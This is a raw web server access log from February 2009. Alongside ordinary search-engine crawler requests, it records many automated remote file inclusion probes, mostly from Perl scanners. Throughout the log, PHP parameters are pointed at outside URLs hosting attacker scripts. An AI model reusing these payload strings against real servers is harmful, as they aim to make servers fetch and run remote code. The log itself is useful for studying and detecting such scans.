66.249.67.180 - - [06/Feb/2009:18:04:07 -0600] "GET /logs/access_log.1208736000 HTTP/1.1" 200 2253 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
123.242.229.128 - - [06/Feb/2009:18:21:56 -0600] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://h1.ripway.com/tonework/tukulesto/id.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
123.242.229.128 - - [06/Feb/2009:18:21:56 -0600] "GET /logs/access_log.1227312000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://h1.ripway.com/tonework/tukulesto/id.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
123.242.229.128 - - [06/Feb/2009:18:21:56 -0600] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://h1.ripway.com/tonework/tukulesto/id.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
123.242.229.128 - - [06/Feb/2009:18:27:01 -0600] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://h1.ripway.com/tonework/feelcomz/id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
123.242.229.128 - - [06/Feb/2009:18:27:01 -0600] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://h1.ripway.com/tonework/feelcomz/id1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
123.242.229.128 - - [06/Feb/2009:18:27:01 -0600] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://h1.ripway.com/tonework/feelcomz/id1.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
123.242.229.128 - - [06/Feb/2009:18:27:24 -0600] "GET /logs/access_log.1229817600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://h1.ripway.com/tonework/feelcomz/id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
123.242.229.128 - - [06/Feb/2009:18:36:10 -0600] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://h1.ripway.com/tonework/v6/id.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
123.242.229.128 - - [06/Feb/2009:18:36:10 -0600] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://h1.ripway.com/tonework/v6/id.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
65.55.230.166 - - [06/Feb/2009:18:41:41 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.230.166 - - [06/Feb/2009:18:41:41 -0600] "GET /logs/access_log.1166659200 HTTP/1.1" 200 656 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
66.249.67.180 - - [06/Feb/2009:18:44:54 -0600] "GET /logs/access_log.1143504000 HTTP/1.1" 200 992 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.67.180 - - [06/Feb/2009:18:59:42 -0600] "GET /logs/access_log.1126396800 HTTP/1.1" 200 602 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
213.239.241.13 - - [06/Feb/2009:19:06:24 -0600] "GET /logs/allinurl:errors.phphttp://coopandhoney.com/safe.txt? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
213.239.241.13 - - [06/Feb/2009:19:06:24 -0600] "GET /allinurl:errors.phphttp://coopandhoney.com/safe.txt? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
213.239.241.13 - - [06/Feb/2009:19:08:03 -0600] "GET /logs/allinurl:%22errors.php%22error=http://coopandhoney.com/safe.txt? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
213.239.241.13 - - [06/Feb/2009:19:08:04 -0600] "GET /allinurl:%22errors.php%22error=http://coopandhoney.com/safe.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
65.55.208.139 - - [06/Feb/2009:19:12:38 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.139 - - [06/Feb/2009:19:12:38 -0600] "GET /logs/access_log.1136332800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.139 - - [06/Feb/2009:19:12:39 -0600] "GET /logs/access_log.1186012800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
66.249.67.180 - - [06/Feb/2009:19:13:16 -0600] "GET /logs/access_log.1149379200 HTTP/1.1" 200 845 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
83.172.144.67 - - [06/Feb/2009:19:18:17 -0600] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://researchcore.org/publications/docs/spiegel_dulai.pdf? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
83.172.144.67 - - [06/Feb/2009:19:18:17 -0600] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://researchcore.org/publications/docs/spiegel_dulai.pdf? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
210.1.31.52 - - [06/Feb/2009:19:19:48 -0600] "GET /logs/errors.php?error=http://rean.fileave.com/header.jpg? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
210.1.31.52 - - [06/Feb/2009:19:19:49 -0600] "GET /errors.php?error=http://rean.fileave.com/header.jpg? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
66.249.67.180 - - [06/Feb/2009:19:22:22 -0600] "GET /logs/access_log.1189209600 HTTP/1.1" 200 508 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.118.187.56 - - [06/Feb/2009:19:22:44 -0600] "GET /logs//include/write.php?dir=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
66.118.187.56 - - [06/Feb/2009:19:22:44 -0600] "GET /logs/access_log.1228608000//include/write.php?dir=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
70.84.182.98 - - [06/Feb/2009:19:25:30 -0600] "GET /logs//appserv/main.php?appserv_root=http://www.henneferkanuteam.de/apboard/info.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.810"
70.84.182.98 - - [06/Feb/2009:19:25:31 -0600] "GET //appserv/main.php?appserv_root=http://www.henneferkanuteam.de/apboard/info.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
70.84.182.98 - - [06/Feb/2009:19:28:45 -0600] "GET /logs//appserv/main.php?appserv_root=http://www.henneferkanuteam.de/apboard/info.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.810"
70.84.182.98 - - [06/Feb/2009:19:28:45 -0600] "GET //appserv/main.php?appserv_root=http://www.henneferkanuteam.de/apboard/info.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
70.84.182.98 - - [06/Feb/2009:19:29:10 -0600] "GET /logs//appserv/main.php?appserv_root=http://www.henneferkanuteam.de/apboard/info.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.810"
70.84.182.98 - - [06/Feb/2009:19:29:10 -0600] "GET //appserv/main.php?appserv_root=http://www.henneferkanuteam.de/apboard/info.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
213.239.241.13 - - [06/Feb/2009:19:36:02 -0600] "GET /logs/errors.php?error=http://coopandhoney.com/safe.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
213.239.241.13 - - [06/Feb/2009:19:36:02 -0600] "GET /errors.php?error=http://coopandhoney.com/safe.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
216.246.53.145 - - [06/Feb/2009:19:53:29 -0600] "GET /logs/?_zb_path=http://madrigaldelavera.es/joomla/mambots/editors/idz.txt?? HTTP/1.1" 200 177104 "-""libwww-perl/5.822"
216.246.53.145 - - [06/Feb/2009:19:53:29 -0600] "GET /?_zb_path=http://madrigaldelavera.es/joomla/mambots/editors/idz.txt?? HTTP/1.1" 200 3245 "-""libwww-perl/5.822"
77.232.66.107 - - [06/Feb/2009:20:01:47 -0600] "GET /logs/vwar//includes/functions_install.php?vwar_root=http://www.jrbr.com.br/images/it2.jpg??? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
77.232.66.107 - - [06/Feb/2009:20:01:47 -0600] "GET /vwar//includes/functions_install.php?vwar_root=http://www.jrbr.com.br/images/it2.jpg??? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
69.16.252.116 - - [06/Feb/2009:20:14:00 -0600] "GET //includes/class_item.php?fileExtension=http://www.adaiwa.com/car/images/uploads/user??? HTTP/1.1" 404 307 "-""libwww-perl/5.811"
69.16.252.116 - - [06/Feb/2009:20:14:00 -0600] "GET /logs//includes/class_item.php?fileExtension=http://www.adaiwa.com/car/images/uploads/user??? HTTP/1.1" 404 312 "-""libwww-perl/5.811"
77.232.66.107 - - [06/Feb/2009:20:16:56 -0600] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.jrbr.com.br/images/it2.jpg??? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
77.232.66.107 - - [06/Feb/2009:20:16:57 -0600] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.jrbr.com.br/images/it2.jpg??? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
77.232.66.107 - - [06/Feb/2009:20:59:19 -0600] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.jrbr.com.br/images/it2.jpg??? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
77.232.66.107 - - [06/Feb/2009:20:59:21 -0600] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.jrbr.com.br/images/it2.jpg??? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
74.220.207.83 - - [06/Feb/2009:21:08:09 -0600] "GET //bbshop/shop/index.php?_shop_path=http://www.lingerie.net/alkaidakillbush.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.812"
74.220.207.83 - - [06/Feb/2009:21:08:09 -0600] "GET /logs//bbshop/shop/index.php?_shop_path=http://www.lingerie.net/alkaidakillbush.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.812"
207.45.185.194 - - [06/Feb/2009:21:10:28 -0600] "GET //bbshop/shop/index.php?_shop_path=http://www.lph.go.th/main/SBU/RenovateWeb//appserv/exp.txt%0D?? HTTP/1.1" 404 305 "-""libwww-perl/5.814"
207.45.185.194 - - [06/Feb/2009:21:10:31 -0600] "GET /logs//bbshop/shop/index.php?_shop_path=http://www.lph.go.th/main/SBU/RenovateWeb//appserv/exp.txt%0D?? HTTP/1.1" 404 310 "-""libwww-perl/5.814"
203.200.95.142 - - [06/Feb/2009:21:14:08 -0600] "GET //bbshop/shop/index.php?_shop_path=http://www.lingerie.net/alkaidakillbush.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
203.200.95.142 - - [06/Feb/2009:21:14:08 -0600] "GET /logs//bbshop/shop/index.php?_shop_path=http://www.lingerie.net/alkaidakillbush.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
69.65.101.89 - - [06/Feb/2009:21:28:28 -0600] "GET /logs//include/footer.php?_path[counter]=http://www.wycom.co.kr/board/id.txt???? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
69.65.101.89 - - [06/Feb/2009:21:28:28 -0600] "GET //include/footer.php?_path[counter]=http://www.wycom.co.kr/board/id.txt???? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
84.21.71.133 - - [06/Feb/2009:21:28:40 -0600] "GET //include/footer.php?_path[counter]=http://www.wycom.co.kr/board/readme.txt???? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
84.21.71.133 - - [06/Feb/2009:21:28:40 -0600] "GET /logs//include/footer.php?_path[counter]=http://www.wycom.co.kr/board/readme.txt???? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
74.200.197.234 - - [06/Feb/2009:21:29:39 -0600] "GET /logs//include/footer.php?_path[counter]=http://www.wycom.co.kr/board/oye.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.811"
74.200.197.234 - - [06/Feb/2009:21:29:39 -0600] "GET //include/footer.php?_path[counter]=http://www.wycom.co.kr/board/oye.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.811"
91.121.24.179 - - [06/Feb/2009:21:31:15 -0600] "GET /logs//include/footer.php?_path[counter]=http://www.wycom.co.kr/board/readme.txt???? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
91.121.24.179 - - [06/Feb/2009:21:31:15 -0600] "GET //include/footer.php?_path[counter]=http://www.wycom.co.kr/board/readme.txt???? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
65.55.208.133 - - [06/Feb/2009:21:43:46 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.133 - - [06/Feb/2009:21:43:47 -0600] "GET /logs/access_log.1202774400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.133 - - [06/Feb/2009:21:43:48 -0600] "GET /logs/access_log.1176681600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.133 - - [06/Feb/2009:21:43:48 -0600] "GET /logs/access_log.1205884800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.133 - - [06/Feb/2009:21:43:48 -0600] "GET /logs/access_log.1210809600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
67.19.251.42 - - [06/Feb/2009:21:44:15 -0600] "GET //include/footer.php?_path[counter]=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
67.19.251.42 - - [06/Feb/2009:21:44:15 -0600] "GET /logs//include/footer.php?_path[counter]=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
67.19.251.42 - - [06/Feb/2009:21:44:15 -0600] "GET /logs/access_log.1227571200//include/footer.php?_path[counter]=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
65.55.208.130 - - [06/Feb/2009:21:45:54 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.130 - - [06/Feb/2009:21:45:56 -0600] "GET /logs/access_log.1148256000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.130 - - [06/Feb/2009:21:45:58 -0600] "GET /logs/access_log.1188950400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.130 - - [06/Feb/2009:21:45:59 -0600] "GET /logs/access_log.1200960000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.130 - - [06/Feb/2009:21:46:00 -0600] "GET /logs/access_log.1196380800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.130 - - [06/Feb/2009:21:46:01 -0600] "GET /logs/access_log.1171929600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.130 - - [06/Feb/2009:21:46:02 -0600] "GET /logs/access_log.1134864000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.130 - - [06/Feb/2009:21:46:03 -0600] "GET /logs/access_log.1143158400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.130 - - [06/Feb/2009:21:46:03 -0600] "GET /logs/access_log.1113782400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
66.34.133.35 - - [06/Feb/2009:21:51:54 -0600] "GET /logs/access_log.1227571200//include/footer.php?_path[counter]=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
66.34.133.35 - - [06/Feb/2009:21:51:54 -0600] "GET //include/footer.php?_path[counter]=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
66.34.133.35 - - [06/Feb/2009:21:51:54 -0600] "GET /logs//include/footer.php?_path[counter]=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
200.203.126.15 - - [06/Feb/2009:21:56:40 -0600] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.henneferkanuteam.de/apboard/info.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
200.203.126.15 - - [06/Feb/2009:21:56:40 -0600] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.henneferkanuteam.de/apboard/info.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
200.203.126.15 - - [06/Feb/2009:21:56:40 -0600] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.henneferkanuteam.de/apboard/info.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
200.203.126.15 - - [06/Feb/2009:21:56:40 -0600] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.henneferkanuteam.de/apboard/info.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
207.213.245.215 - - [06/Feb/2009:22:39:35 -0600] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bulitippspiel.com//components/com_jombib/jombib/components/lib/id.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.65"
207.213.245.215 - - [06/Feb/2009:22:39:36 -0600] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bulitippspiel.com//components/com_jombib/jombib/components/lib/id.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.65"
66.34.133.35 - - [06/Feb/2009:22:42:23 -0600] "GET /logs//config/dbutil.bck.php?confdir=http://www.wycom.co.kr/board/readme.txt???? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
66.34.133.35 - - [06/Feb/2009:22:42:23 -0600] "GET //config/dbutil.bck.php?confdir=http://www.wycom.co.kr/board/readme.txt???? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
91.186.21.200 - - [06/Feb/2009:23:05:07 -0600] "GET /logs//include/lib.inc.php?site_path=http://researchcore.org/publications/docs/spiegel_dulai.pdf? HTTP/1.1" 404 308 "-""libwww-perl/5.810"
91.186.21.200 - - [06/Feb/2009:23:05:07 -0600] "GET //include/lib.inc.php?site_path=http://researchcore.org/publications/docs/spiegel_dulai.pdf? HTTP/1.1" 404 303 "-""libwww-perl/5.810"
216.67.238.184 - - [06/Feb/2009:23:07:54 -0600] "GET //appserv/main.php?appserv_root=http://iam.skocap.net/Scan2/id.txt???? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
216.67.238.184 - - [06/Feb/2009:23:07:54 -0600] "GET /logs//appserv/main.php?appserv_root=http://iam.skocap.net/Scan2/id.txt???? HTTP/1.1" 404 305 "-""libwww-perl/5.810"
216.22.26.95 - - [06/Feb/2009:23:23:17 -0600] "GET /includes/class_item.php?fileExtension=http://www.stormpages.com/gogon/copyright.txt???? HTTP/1.1" 404 306 "-""Mozilla/5.0"
216.22.26.95 - - [06/Feb/2009:23:23:17 -0600] "GET /logs/access_log.1228348800/includes/class_item.php?fileExtension=http://www.stormpages.com/gogon/copyright.txt???? HTTP/1.1" 404 333 "-""Mozilla/5.0"
216.22.26.95 - - [06/Feb/2009:23:23:17 -0600] "GET /logs/includes/class_item.php?fileExtension=http://www.stormpages.com/gogon/copyright.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
216.22.26.95 - - [06/Feb/2009:23:23:28 -0600] "GET //skin/zero_vote/ask_password.php?dir=http://www.stormpages.com/gogon/copyright.txt???? HTTP/1.1" 404 315 "-""Mozilla/5.0"
216.22.26.95 - - [06/Feb/2009:23:23:28 -0600] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.stormpages.com/gogon/copyright.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
216.22.26.95 - - [06/Feb/2009:23:23:28 -0600] "GET /logs/access_log.1227312000//skin/zero_vote/ask_password.php?dir=http://www.stormpages.com/gogon/copyright.txt???? HTTP/1.1" 404 342 "-""Mozilla/5.0"
216.22.26.95 - - [06/Feb/2009:23:23:28 -0600] "GET /logs/access_log.1227052800//skin/zero_vote/ask_password.php?dir=http://www.stormpages.com/gogon/copyright.txt???? HTTP/1.1" 404 342 "-""Mozilla/5.0"
200.203.126.15 - - [06/Feb/2009:23:26:37 -0600] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.henneferkanuteam.de/apboard/info.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
200.203.126.15 - - [06/Feb/2009:23:26:37 -0600] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.henneferkanuteam.de/apboard/info.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
200.203.126.15 - - [06/Feb/2009:23:27:09 -0600] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.henneferkanuteam.de/apboard/info.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
200.203.126.15 - - [06/Feb/2009:23:27:09 -0600] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.henneferkanuteam.de/apboard/info.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
91.186.21.200 - - [06/Feb/2009:23:34:45 -0600] "GET /logs/errors.php?error=http://www.jeunesxxx.com/idv6.txt???? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
91.186.21.200 - - [06/Feb/2009:23:34:45 -0600] "GET /errors.php?error=http://www.jeunesxxx.com/idv6.txt???? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
91.186.21.200 - - [06/Feb/2009:23:34:47 -0600] "GET /logs/errors.php?error=http://www.jeunesxxx.com/idv6.txt???? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
91.186.21.200 - - [06/Feb/2009:23:34:47 -0600] "GET /errors.php?error=http://www.jeunesxxx.com/idv6.txt???? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
65.55.208.122 - - [06/Feb/2009:23:39:03 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.122 - - [06/Feb/2009:23:39:03 -0600] "GET /?S=D HTTP/1.1" 200 3245 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.122 - - [06/Feb/2009:23:49:35 -0600] "GET /logs/access_log.1157932800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.230.166 - - [07/Feb/2009:00:04:22 -0600] "GET /logs/access_log.1169078400 HTTP/1.1" 200 34343 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
66.249.67.180 - - [07/Feb/2009:00:12:32 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.67.180 - - [07/Feb/2009:00:12:32 -0600] "GET /logs/access_log.1134432000 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
91.186.21.200 - - [07/Feb/2009:00:33:31 -0600] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wycom.co.kr/board/readme.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
91.186.21.200 - - [07/Feb/2009:00:33:32 -0600] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wycom.co.kr/board/readme.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
77.232.66.107 - - [07/Feb/2009:00:34:31 -0600] "GET //skin/zero_vote/error.php?dir=http://vacarecords.com/anyinventory/admin/win.id.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
77.232.66.107 - - [07/Feb/2009:00:34:32 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://vacarecords.com/anyinventory/admin/win.id.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
207.213.245.215 - - [07/Feb/2009:00:40:06 -0600] "GET /logs///vwar/backup/errors.php?error=http://www.bulitippspiel.com//components/com_jombib/jombib/components/lib/id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.65"
207.213.245.215 - - [07/Feb/2009:00:40:06 -0600] "GET ///vwar/backup/errors.php?error=http://www.bulitippspiel.com//components/com_jombib/jombib/components/lib/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.65"
148.245.102.115 - - [07/Feb/2009:00:47:12 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://vacarecords.com/anyinventory/admin/id.txt?%0D? HTTP/1.1" 404 313 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
148.245.102.115 - - [07/Feb/2009:00:47:12 -0600] "GET /logs/access_log.1227312000//skin/zero_vote/error.php?dir=http://vacarecords.com/anyinventory/admin/id.txt?%0D? HTTP/1.1" 404 335 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
148.245.102.115 - - [07/Feb/2009:00:47:12 -0600] "GET //skin/zero_vote/error.php?dir=http://vacarecords.com/anyinventory/admin/id.txt?%0D? HTTP/1.1" 404 308 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
84.21.71.133 - - [07/Feb/2009:00:47:58 -0600] "GET /logs/access_log.1230336000//skin/zero_vote/error.php?dir=http://vacarecords.com/anyinventory/admin/id.txt?? HTTP/1.1" 404 335 "-""Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
84.21.71.133 - - [07/Feb/2009:00:48:00 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://vacarecords.com/anyinventory/admin/id.txt?? HTTP/1.1" 404 313 "-""Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
84.21.71.133 - - [07/Feb/2009:00:48:00 -0600] "GET //skin/zero_vote/error.php?dir=http://vacarecords.com/anyinventory/admin/id.txt?? HTTP/1.1" 404 308 "-""Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
84.21.71.133 - - [07/Feb/2009:00:49:24 -0600] "GET /logs/access_log.1229817600//skin/zero_vote/error.php?dir=http://vacarecords.com/anyinventory/admin/id.txt?? HTTP/1.1" 404 335 "-""Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
84.21.71.133 - - [07/Feb/2009:00:50:00 -0600] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wycom.co.kr/board/readme.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
84.21.71.133 - - [07/Feb/2009:00:50:00 -0600] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wycom.co.kr/board/readme.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
84.21.71.133 - - [07/Feb/2009:00:50:07 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://vacarecords.com/anyinventory/admin/win.id.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
84.21.71.133 - - [07/Feb/2009:00:50:07 -0600] "GET //skin/zero_vote/error.php?dir=http://vacarecords.com/anyinventory/admin/win.id.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
200.203.126.15 - - [07/Feb/2009:00:52:11 -0600] "GET /logs//include/vote.lib.inc.php?site_path=http://www.henneferkanuteam.de/apboard/info.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
200.203.126.15 - - [07/Feb/2009:00:52:11 -0600] "GET //include/vote.lib.inc.php?site_path=http://www.henneferkanuteam.de/apboard/info.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
200.203.126.15 - - [07/Feb/2009:00:52:41 -0600] "GET /logs//include/vote.lib.inc.php?site_path=http://www.henneferkanuteam.de/apboard/info.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
200.203.126.15 - - [07/Feb/2009:00:52:41 -0600] "GET //include/vote.lib.inc.php?site_path=http://www.henneferkanuteam.de/apboard/info.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
91.186.21.200 - - [07/Feb/2009:00:55:29 -0600] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wycom.co.kr/board/readme.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
91.186.21.200 - - [07/Feb/2009:00:55:29 -0600] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wycom.co.kr/board/readme.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
148.245.102.115 - - [07/Feb/2009:00:57:18 -0600] "GET //skin/zero_vote/error.php?dir=http://vacarecords.com/anyinventory/admin/win.id.txt?%0D?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
